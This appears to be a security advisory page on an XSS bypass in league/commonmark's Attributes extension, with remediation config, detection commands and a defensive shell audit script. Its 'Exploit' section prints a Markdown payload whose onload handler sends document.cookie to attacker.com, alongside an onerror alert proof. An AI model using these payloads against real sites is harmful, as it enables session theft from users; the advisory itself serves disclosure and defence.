league/commonmark, Cross-Site Scripting (XSS), CVE-2023-XXXX (Critical)

The CVE-2023-XXXX vulnerability in the league/commonmark library's Attributes extension allows attackers to bypass XSS protections by injecting HTML attributes through Markdown syntax. Even with a hardened configuration such as `html_input: 'strip'` and `allow_unsafe_links: false`, enabling the Attributes extension permits attribute injection through the `{...}` curly-brace syntax.

An attacker can craft a payload like:

<img src="x" alt="alt" />{onerror="alert(1)"}

This renders as:

<img src="x" alt="alt" onerror="alert(1)" />

When the rendered HTML reaches a browser, the injected `onerror` handler runs as JavaScript as soon as the broken image fails to load, giving the attacker arbitrary script execution in the victim's browser and the site's origin. The vulnerability stems from the extension accepting user-supplied attribute names without filtering event-handler attributes, even when raw HTML input is stripped.

DailyCVE Form:

Platform: league/commonmark
Version: 1.5.0 – 2.6.x
Vulnerability: XSS bypass
Severity: Critical
Date: 2023-XX-XX

What Undercode Say:

Exploit:

1. Craft malicious Markdown with event handlers:

<img src="x" alt="XSS" />{onload="fetch('https://attacker.com/?cookie='+document.cookie)"}

2. Use in user-generated content (comments, posts).

Protection:

1. Upgrade to league/commonmark >= 2.7.0.

2. Disable AttributesExtension for untrusted input:

$environment->addExtension(new AttributesExtension()); // Register only on the Environment used for trusted authors; leave it out of the one that renders untrusted input.

3. Sanitize output with libraries like `HTML Purifier`.

Detection Commands:

  • Composer check:
    composer show league/commonmark | grep "version"

  • Grep for vulnerable configs:
    grep -r "AttributesExtension()" /path/to/code
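
The two detection commands above can be tied together into one audit script. The script below is an added example (it is not from this advisory or from the league/commonmark project): it reads the installed version from composer.lock, checks it against the affected range stated on this page (1.5.0 up to, but not including, the fixed 2.7.0), and lists PHP files that register AttributesExtension. The composer.lock and PHP file it creates are constructed sample input so it runs offline; point `audit_project` at a real project directory instead.

```shell
#!/bin/sh
# Added example, not code from the advisory page or the league/commonmark project.
# Audits a PHP project for the two conditions the "Detection Commands" look for:
#   1. an installed league/commonmark in the affected range 1.5.0 <= v < 2.7.0
#   2. source files that register AttributesExtension
# The composer.lock and PHP file created below are constructed sample input.

# Succeed (exit 0) when VERSION lies in the affected range 1.5 <= v < 2.7.
commonmark_vulnerable() {
    v=${1#v}                       # tolerate a leading "v", e.g. v2.6.1
    major=${v%%.*}
    rest=${v#*.}
    minor=${rest%%.*}
    # reject anything that is not plain digits ("dev-main", "2.x-dev", ...)
    case "$major" in ''|*[!0-9]*) return 1 ;; esac
    case "$minor" in ''|*[!0-9]*) return 1 ;; esac
    [ "$major" -eq 1 ] && [ "$minor" -ge 5 ] && return 0
    [ "$major" -eq 2 ] && [ "$minor" -lt 7 ] && return 0
    return 1
}

# Print the league/commonmark version recorded in a composer.lock (nothing if absent).
installed_commonmark_version() {
    awk '
        /"name": *"league\/commonmark"/ { found = 1 }
        found && /"version":/ { gsub(/[",]/, "", $2); print $2; exit }
    ' "$1"
}

# Print PHP files under DIR that mention AttributesExtension (the page's grep, scoped to *.php).
files_registering_attributes_extension() {
    find "$1" -name '*.php' -exec grep -l 'AttributesExtension' {} + 2>/dev/null || true
}

# Audit DIR: print findings; exit 0 when the vulnerable combination is present.
audit_project() {
    dir=$1
    version=$(installed_commonmark_version "$dir/composer.lock")
    users=$(files_registering_attributes_extension "$dir")
    echo "league/commonmark version: ${version:-not found}"
    echo "files registering AttributesExtension: ${users:-none}"
    if [ -n "$version" ] && commonmark_vulnerable "$version" && [ -n "$users" ]; then
        echo "FINDING: affected version with AttributesExtension enabled; upgrade to >= 2.7.0"
        return 0
    fi
    echo "no vulnerable combination found"
    return 1
}

# --- constructed sample project (stands in for a real checkout) -------------
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/composer.lock" <<'EOF'
{
    "packages": [
        {
            "name": "league/commonmark",
            "version": "2.6.1"
        }
    ]
}
EOF
mkdir -p "$SAMPLE_DIR/src"
cat > "$SAMPLE_DIR/src/Markdown.php" <<'EOF'
<?php
use League\CommonMark\Extension\Attributes\AttributesExtension;
$environment->addExtension(new AttributesExtension());
EOF

audit_project "$SAMPLE_DIR"
```

The version check deliberately refuses non-numeric versions such as `dev-main`; a branch install needs to be checked by hand against the fix rather than silently passed. A finding only means the affected combination is present; whether untrusted input ever reaches that converter still has to be confirmed in the application.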

Patch Analysis:

  • Blocks `on` attributes by default.
  • Enforces `allow_unsafe_links` for href/src.

Mitigation Code:

// Safe config (if upgrade impossible):
$config = [
    'html_input' => 'escape',
    'allow_unsafe_links' => false,
    'attributes' => ['disallowed' => ['on']],
];

Reported By: github.com